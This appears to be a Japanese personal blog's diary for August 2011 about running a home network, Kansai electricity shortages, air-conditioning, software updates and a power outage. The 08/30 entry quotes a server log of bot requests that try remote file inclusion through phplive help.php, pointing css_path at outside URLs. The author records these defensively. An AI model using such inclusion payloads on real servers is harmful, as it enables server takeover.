自宅通信網の運用日誌2011年08月


お知らせ

 リンク切れが発生しにくくするためと、多くの項目が一つのページに集中することにより検索サイトを使った検索結果が適切で無くなることを防止するために、「自宅通信網の運用日誌」の構造を月ごとに分離した形にしています。

 お手数ですが最新月以外は当該年月のリンクを使って閲覧してください。


目次


08月

トップページへ戻る 目次へ戻る

2011/08/01 Mon

日誌の切り替え

 関西も節電体制に入りつつある。東京のように暑くて暗いというのがとてもはっきりしている分けではないが、そこかしこで節電の工夫が行われている。電車の中が暑くなったとか、オフィイスで蛍光灯が一部抜かれているとか。一時期コンビニがえらく暗くなっているとか、ラーメン屋の冷房が切れて、全く入る気がしなくなったなどが起きたが、現在はそういった極端な物は逆に減った。

 節電のせいではないとは思うが、ページリクエスト数が急減。1万どころか9千5百ページリクエストを割り込んで9,458ページリクエストだった。スパイダやそれ以外の自動プログラムらしきアクセスの減少も著しい。

 内容をよく読んでくれていると思える人とAmazonのアフェリエイトをクリックしてくれる人はかなりの相関があるようにログ上は思える。この、Amazonのアフェリエイトをクリックしてくれる人も急減したので、検索などから、巧く当サイトが見つけにくい状況になったのではないかと思う。

 今月も日誌以外の記事の更新のないサイトへのアクセスとしてはよく読んでいただけてると思う。

関電の電気予報がチャレンジャブル

 関電の電気予報が何か挑戦的な予報になっている。

今日明日の関電の電気予報の比較
日付 予想最大電力 ピーク時供給力 最大使用率
2011/08/01 2,490万kW 2,900万kW 86%
2011/08/02 2,510万kW 2,880万kW 87%

 今日より明日の予想最大電力が大きいにもかかわらず、明日のピーク時供給電力が小さい。明日の気温予想が今日より低いので、それを見越しているのか、何か調整をしているのか、週後半の温度の高い日に備えて今のうちに何か点検するのか?

 と書いていたら、電力購入先のトラブルで78万kWの電力供給を受けられなくなったとの報道がNHKのニュースで流れていた。


トップページへ戻る 目次へ戻る

2011/08/02 Tue

節電効果(1)

 関西電力管内の節電の状況は、あまり芳しくないらしい。それでも7%程度の節電が認められるとのニュースが流れている。

 当公開Webサイトのサーバや大きなパソコンが稼働している上、外気温時計が朝方46.8℃を記録するくらい周りがとても暑いので、冷房負荷がとても高く電力消費が多い。去年(2011年)の8月期は858kWhを記録している。

 こんな事情もあり、節電に協力する意味も含めて、12年使った5kWの能力の日立の白クマくん(RAS-5010KX2)を更新予定を3年早めて今時のエアコンに交換した。

 RAS-5010KX2は、普通の日は十分な能力なのだが、本当に暑い日はじりじりと室内温度が保てずに上がっていくし、真冬の寒い日は夜に室内が暖かさを維持できずに温度が下がって寒いときがあった。結構過酷な環境に対して冷暖共に少し能力不足の時があったように思う。そこで、今回はほんの少し能力アップして、5.6kWのダイキンうるるとさらら 上新電機仕様(AN-56MRPJ-W)に交換。これと合わせて、反射タイプ遮熱シート(東洋アルミエコープロダクツ 節電窓シート 環境省 ETV 実証番号 051-0904)を自分で張ってみた。

 RAS-5010KX2は12年前のエアコンと言っても、PAMインバータエアコンで当時としては高効率の物だった。それに対して、今回のAN-56MRPJ-Wは高効率ながら今時の物の中では一番効率が良いという物ではない。それにもかかわらず良く効果が出た。このままで行けば、このAN-56MRPJ-Wの1ヶ月の消費電力は135kWで、RAS-5010KX2に比べて多分3/4以下、もしかすると2/3に達するかも知れない。これは、去年よりは7月後半に温度が高くなかったとはいえ、随分良い成績が出ているように思う。


トップページへ戻る 目次へ戻る

2011/08/03 Wed

関西方面の通信が瞬停

 関西方面の通信状況を調べるのに使わせていただいている、奈良WIDWのFTPサーバとの通信が、本日15:35:24 +0900 (JST)に少し途絶えた。

1011年8月3日関西方面の通信途絶
図. 関西方面の通信状況

 ここのところ通信が安定していたので、久しぶり。以前より大学が休みの暑い日に日に通信途絶の傾向があった。エアコンでも切れて調子が悪くなるのだろうか。フリーの公共サーバの運用は難しいのだろうなぁ。

節電効果(2)

 昨日書いた、エアコンの買い換えの件、7月初めの土曜日に神戸の上新電機へ買いに行った。ダイキンを皮切りに秋から金属資源高騰のため値上げがされるとの噂を聞いていたので、早めに行ったのだが、販売店の売り子をしていたメーカーの人は知らないとの事だった。

 まだ、ほとんどの所のボーナスが支給されてない時期だと思うが、エアコン売り場は人がいっぱで、どんどん商談が進行しているようだった。どうも、今年は春のエアコン売れ行きの谷間期間がはっきりしなかったらしく、売れ行きの谷を埋めて2ヶ月ほど早く売れ始めていたようだ。

 関西、しかも大阪よりは暑くない神戸(兵庫)ですらこのペースで家庭のエアコンが入れ替わっているとすると、少しは夏の節電に効果が現れるのではないだろうか。

 しかし、早く始まった分だけ物がないようで、私が求めた物(ダイキンAN-56MRPJ-W)は7月初めの土曜日に購入しても、届くのは、7月下旬になるとの事だった。サービスセンタの在庫を調べてもらって、たまたま残っている物を割り当ててもらって、7月12日に取り付けてもらえた。この状況だったとすると、ボーナスが支給された後に購入した人たちは、まだ取り付けてもらっていない人も多いのではないだろうか。

 関西では家庭の節電効果があまり出ていないとの話も出ているようだが、これだけ買い換えが進んでいるように思えるエアコンの節電効果が、これから実績として表れるほどの効果になるかも知れない思った。


トップページへ戻る 目次へ戻る

2011/08/04 Thu

節電効果(3)

 反射タイプ遮熱シート(東洋アルミエコープロダクツ 節電窓シート 環境省 ETV 実証番号 051-0904)は、ちゃんと遮熱効果があるのは間違いなさそう。しかし、費用対効果という面では元が取れるのは難しいかなという感じ。

 このシート、反射型でスペックが高い上に吸着式で良さそうに思っていたのだが、6月末あたりでは身近に取り扱っているところを見つけられなかった。ところが、たまたま他の買い物に行ったイトーヨーカ堂で売っているのを見つけて購入。450mm×900mm1枚950980円。

 手持ちがなかったので、いつもいる部屋の2カ所の窓(建具4枚で硝子8枚)のうち、半分に貼れる枚数しか買えなかった。半分だけ貼ったところ、貼った側と、貼らなかった側で暑さが違う。温度も2℃弱変わっていたように思う。ちゃんと効果が出ている感じだった。

 遮熱効果を出す為に、可視光もかなり反射してしまっているので、部屋の明るさが下がったことが分かる。夏場はまぶしさが和らいで良い感じだが、冬場はじゃまに感じるかもなぁと思う。また、遮熱効果が高いので、冬場は昼間の日差しで温まる分が減ってしまい逆に損失になることが、環境省 ETV 実証番号 051-0904に記載された結果を見ると分かる。

 14枚使ったので、\13,720になる。5年の寿命と言われているので、1年で\2,744の効果が出てくれないと元が取れない。標準的な使い方だと夏に効果が9千円近くの効果が出たとしても冬に逆に損失が5千円弱の損失が出るようなデータとなっている。差し引き年間5千円弱の効果となっている。

 平日昼間に留守がちの場合その分、夏の効果も冬の損失も小さくなる事になり差し引き金額は小さくなるはず。\2,744は3/5程にあたるため、そこまで効果が出るかなぁと言うところ。ただ、今回導入したAN-56MRPJ-W場合、冷房のCOPが環境省 ETV 実証番号 051-0904の前提よりだいぶ下回っていて、暖房の方が環境省 ETV 実証番号 051-0904の前提に近いので、節電効果が大きめに出るかも知れない。

 微妙なセンなので、夏の節電協力とあっさり割り切って、冬にはがした方がよいかも知れないと思っている。そう考えると、外断熱になって、設置撤去が簡単な外にすだれをかけるのが一番効果的だろうと思う。しかし、これはこれで留守中に強風が吹いたときに心配だ! などと思う。


トップページへ戻る 目次へ戻る

2011/08/07 Sun

電力不足(関西の山場?)

 明日の電力状況が、今夏の関西電力地域の山場になりそうに思う。時間は明日の14時。この次に厳しそうなのが明後日。

 これさえ乗り切れば、盆休みを兼ねた夏休みに入る企業が増えてくるので需要が減ってくるように思う。後半には、78万kWの電力供給が出来なくなっていた他社受電分(多分J-Powerの高砂と橘湾の2カ所の火力発電所)のうち一部が復帰してくるはずなので、大分楽になってくると思う。

 このあたり、関西電力がどこからどれだけという情報を公開していないようなので、変な疑惑を呼んでいるとおもう。7月1日の姫路第2発電所のトラブルも合わせて「火力の故障が多すぎて都合良すぎる、意図的な物じゃないか」と。

 関西電力が運用する火力発電所の運転停止を伴うトラブルは、2010年度実績で29件ある。この実績からすると1ヶ月辺り2.4件の停止トラブルがあるので、これからすると現状は少ないくらいだと思う。さらに、7月の頭に停止した姫路第2発電所は、新鋭のGTCC(ガスタービンコンバインドサイクル)の発電機に置き換えている最中に、古い設備を緊急に稼働させた物であるので、何か起こりやすそうな状況であったと考える。

 さらに、関西電力と特有の問題もあると思う。関西電力は初期に水力発電所が非常に強く、現在は原子力発電の実績発電量が半分に達する。火力がベースロード用として運用された期間がほとんど無い1960年頃から1985年までと短い期間だったのではないかと思う。このため、現行の社員の大半が原主火従の運用形態の世代だと思う。また、火力発電所の数は石油火力が多いが、発電実績的にはガス火力の方が多い。よって、姫路第1のGTCCと舞鶴の石炭火力がベースロード用で、それ以外で所有する火力発電所はピークロード用で運転されている物がほとんどなのではないかと思う。

 ベースロード用発電所は一定の電力をいつでも変わりなく長期間連続して運転し続けるように設計される。ピークロード用は、機敏に発電量を変化させる事を重視され、ピーク出力を長く維持することは意図されないはずだと思う。また、ベースロード用発電所に比べれば長期に止まることなく運用し続けることを重視してされてはいないと思う。これが、火力発電所の運転停止を伴うトラブルに現れているように思う。ピークロード用が運転停止しても、以前ならば空回しすることを覚悟で原子力発電を含む豊富なベースロード用の出力を上げれば乗り切ることが出来た。

 東京電力や中部電力は、原子力発電の比率はさほど高くない。主力は火力発電である。この為、ベースロード用火力発電所が主力として動いていただろうし、社内的な感覚も十分あっただろうと思う。

 東京電力の場合、原子力発電所に関する発表に比べて火力発電所関連の発表は同じ会社とは思えないほど明確だった。中部電力は浜岡原子力発電所が止める稼働か判断を迫られて段階で直ちに会長が燃料確保にカタールに飛んでおり、このあたりについて対処が際立っていたように思う。

 特に、中部電力は水力が歴史的に弱く、火力が主力であり続けた電力会社のように思う。結果、世界最大級の400万kWを越える発電所をガス火力と石炭火力でそれぞれに持っており、300万kWを越える火力も2カ所もある。

 東京電力や中部電力は、原子力発電の電力が無くなればベースロード用大型火力を強化して運用する余地が大きい。そのような運用に対しても社内的な経験の蓄積が豊富に思う。

 しかし、関西電力はピークロード用火力をベースロード用に転用して運転するしかないことになる。そのうえ、火力をベース電力の主力として運用する経験が豊かではないように思う。この弱点を補う為、J-Powerの超々臨界圧技術(USC)等を使った高効率石炭火力とコベルコの都市型火力発電所に頼るところが多くなっているのだと思う。よって自身の管理外の運転停止要因が増えることになる。

 以上の話は、去年までの実績資料や公表されている資料からの推測に過ぎない。関西電力は、このあたりの実情を公表して理解を求めて欲しいと思う。何を発表しても文句を言われるような状態ではあるが、正しい内容に基づく公開は、ちゃんと参考にして利用して益となる人も多くいると思う。

 特に、過去の実績からすると、2カ所くらいの発電所が同時に停止を伴うトラブルに遭遇し供給能力が大幅に低下することは十分想定されるように思う。もし発生したときに「そんなきわどい状況を実数を交えて説明してくれていたら、対処もしたのに」と思う人は、多くいるのではないかと思う。

 一個人が今頃こんな所に書き込んでも詮無い事ではあるが、東京電力や中部電力の火力発電関係の情報公表量に対して、関西電力の火力発電の情報公開がどうにももどかしい。

 今年の夏は、きわどい程度で済むけれど、このまま行けば冬場や来年の夏は、まるで足りないというレベルになる可能性もあるのにと思う。

 こういう意見は電力会社よりの意見に流されているのかなぁ。


トップページへ戻る 目次へ戻る

2011/08/09 Tue

電力不足(関西の山場!)

 今日の電力需給はなかなか逼迫していた。公式には14時に2,785万kWで94.7%であった。東北電力とほぼ同じで東北電力に次いで逼迫した状況であった。瞬間最大電力は2,801万kWで95.3%で厳しい状況だった。

 私の一昨日の予想と違い、明日の電力はもっと厳しそうだ。関電の電気予報の予想最大電力は2,750万kWで、Yahoo!電気予報(ベータ版)の最大予測電力は2,892万kWとなっている。Yahoo!の前日予想は少し悲観的に出るので、もう少ない電力量になりそうに思う。

 それにしても、関電もかなり逼迫すると考えているようで、ピーク時供給力3,010万kWと公表している。この値は、関電が今月頭に「今夏の需給見通しについて(8月1日時点)」で公表していた供給力2,951万kWより多い。中国電力の三隅発電所1号機が再び発電停止して電力融通の現状維持が精一杯の中どこから引っ張り出してきたのだろう? 明日の電力供給に余裕のある中部電力からの融通だろうか?

 明日、近畿地方は昼から一部地域で雨が降りそうな空模様だが、その予想が外れた場合かなりの綱渡りになりそうな感じがする。明日、勤め先に出たら、サーバー類の停止分担と手順をなどを確認したいと思う。


トップページへ戻る 目次へ戻る

2011/08/12 Fri

一昨日のWindowsの定期セキュリティアップデートを昨日実施した

 8月10日はMS Windowsの定期セキュリティアップデートの日。今月はかなり多かった。

 今月は月初めに前もって前もって、アップデートを実行していなかったせいか多かった。

 WindowsXPはOS本体のアップデートが5件、IEの累積的なセキュリティ更新が1件、.NET関連が7件、Office関係が1件、悪意のあるソフトウェアの削除ツールを含めて15件であった。


トップページへ戻る 目次へ戻る

2011/08/17 Wed

電力不足(無事終了?)

 7日の「電力不足(関西の山場?)」で「1ヶ月辺り2.4件の停止トラブルがあるので、これからすると現状は少ないくらい」と書いた。これが、不吉な予言のように当たってしまい、14日に堺港発電所2号機の運転が停止してしまった。

 そのような中で迎えた盆明けは温度も高い日が続いており厳しい電力需給が予想されたが、予想の6%程度の少ない2,528万kW(瞬時値2528万kW)最大電力で終了した。明日は、2,700万kWが予想されているが、ピーク供給能力が2,990万kWに強化されており実使用率90%を越えないと思う。

 これで、9日の「電力不足(関西の山場!)」の通りに最大電力2,785万kWで94.7%(瞬間最大電力は2,801万kWで95.3%)の9日が今年の最大の山場であったと言うことになりそうだ。

主要ソフトウエアのバージョンアップ

 メインのブラウザとしているMozilla Firefoxがメジャーバージョンアップした。

 Firefoxは6週間おきに新バージョンを公開する「高速リリースサイクル」を導入している。この為、脆弱性の修正も原則メジャーアップデートので行われる。

 この方針は、新しい機能が、次々に実装されるメリットがある。しかし、今までの機能で満足していても脆弱性の修正がメジャーアップデートで行われるので、上位バージョンに乗り換えざるを得ない。メジャーバージョンアップすると、アドオンで対応していない物が大量に出てしまうし、スクリプト類を多用しているWebページによくある、知らないバージョンでは表示をしないように制御しているページが見れなくなってしまう。

 もっとも、知らないバージョンでは全く表示しないのは、Webページ設計上の配慮不足であるように思うが、現実的にはかなり存在しているので不便になってしまう。後方互換性を期待して表示するようにページ設計をしてもらえると良いのだが。


トップページへ戻る 目次へ戻る

2011/08/24 Wed

定期外のWindows Update

 予定外にWindos Updateがリリースされていた。

 脆弱性への緊急対応かと思って驚いたが、夏時間(サマータイム)の対応変更のようだ。


トップページへ戻る 目次へ戻る

2011/08/28 Sun

停電発生(2011/08/27 Sat)

 昨日の夕方(2011/08/27 Sat 18:11:29-18:12:43)、激しい雷雨の中、久しぶりの停電が発生した。メインPC使用中の瞬停ではない停電は久しぶり。停電時間が1分を超え電源が回復直前にシャットダウンシーケンスに入ってしまったので、電源回復後にシャットダウン。5分の休止の後UPSが再起動し通常状態に復帰した。

 各所、特に大きな障害無く復帰したが、細かな問題が発生した。

 MRTGはルータの累計時間の値がリセットしてしまったのだと思う。

停電時の通信状況(SRT100)

停電時のインターネット側通信量
インターネット側[bit/s]

停電時のローカル公開サーバ側通信量
ローカル公開サーバ側[bit/s]

停電時のローカル一般側通信量
ローカル一般側[bit/s]

 UPS側の障害は、再起動後の通信不良。USBで接続しているのだが通信できなくなっていた。

 UPSはSNMPの拡張ボードを搭載しているのだが、それがDHCPからもらうIPアドレスが変わっていて、元のアドレスで捜して、それが見つからないという表示になっている。USB側の通信にすれば正常に戻った。


トップページへ戻る 目次へ戻る

2011/08/30 Tue

Botによる脆弱性プローブ

 昔から時々見かけるPHPをインストールしたWebサーバの脆弱性を探るプローブリクエストが大量に行われたのを検出した。多分、botによる踏み台を捜す網羅的な探索だと思う。

 このリクエストで、後半に書いてあるURLのファイルを返すと、本格的に攻撃の為の踏み台に使われるのだと思う。

リクエスト件数ファイル
156/phplive/help.php
39  /phplive/help.php?css_path=??
39  /phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/idxml.txt??
30  /phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/men.jpg??
30  /phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/man.jpg??
156/log/phplive/help.php
39  /log/phplive/help.php?css_path=??
39  /log/phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/idxml.txt??
30  /log/phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/men.jpg??
30  /log/phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/man.jpg??
80/log/200709.html/phplive/help.php
20  /log/200709.html/phplive/help.php?css_path=??
20  /log/200709.html/phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/idxml.txt??
16  /log/200709.html/phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/man.jpg??
16  /log/200709.html/phplive/help.php?css_path=http://www.blu-nightclub.co.uk/main/images/men.jpg??
24/idea/url(data:image/png
22/tips/url(data:image/png
17/log/help.php
10  /log/help.php?css_path=http://GOBER.fileave.com/boy.java.txt??
17/help.php
10  /help.php?css_path=http://GOBER.fileave.com/boy.java.txt??

 これだけ大量なのは珍しい。

PRが3/10に戻っている

 当公開Webサイトのグーグルページランク(Google Page Rank:PR)がどうも、3/10に戻っているようだ。1ヶ月半前にPR4/10だったので、8月に変更があったのが濃厚。検索サイトからの訪問傾向を考えると、2011年 7月24日の週あたりにランクが下がったように思う。


トップページへ戻る 目次へ戻る

2011/08/31 Wed

バーチャルマネキンを見てきた

 大丸梅田店に今日まで試験設置されたバーチャルマネキン「ハルコ」を見てきた。透明スクリーンとの噂があったので一度見てみたいと見に行ったが、透明スクリーンではなかった。

「ハルコ」の設置状況

 赤矢印の先がバーチャルマネキン「ハルコ」。PHSのカメラで撮ったところ、投影している部分が白く飛んでしまった。実物はもう少しそれらしい色で、挨拶などをして動いていた。


「ハルコ」2/3

 上半身が反面からの投影で、下半身が印刷。アクリル製のようであった。


「ハルコ」の投影機とスクリーンの関係

 左が、投影機。プロジェクタらしき物が上方向に投影しており、ミラーで前面(右方向)に光が折り曲げられて右のスクリーンに背面から投影されている。


「ハルコ」のスクリーン背面

 スクリーンは透明スクリーンではなく、白い塗料が塗ってありそれがスクリーンの役割をしていた。



2011年09月へ

トップページへ戻る 目次へ戻る

2011年08月(葉月)の気分転換におすすめの本


となりの関くん商品詳細

 メディアファクトリーコミックス公式の立ち読みページで試し読みができます。コミックフラッパー編集部ブログには、画像の形で少し多めに掲載さています。

 今月は、『となりの関くん』(森繁拓真 著、2011年04月23日第1巻発売)を紹介します。

 教室の中で、ひたすら授業と関係のない内職で遊ぶ話です。奇想天外の内職を実行する関くんを、となりの席の横井さんだけが気づいており、ドキドキしながら見入ってしまい、その結果しょっちゅうとばっちりを食らうお話です。

 この関くんの内職は、職人技を駆使して行われます。高度な技を駆使した内職も終わればかたづけられてしまい何が残るという分けではないのに、奇想天外で高度な技を駆使した内職が毎回行われていきます。

 難しいことを考えることなく、気分転換におすすめできるお話です。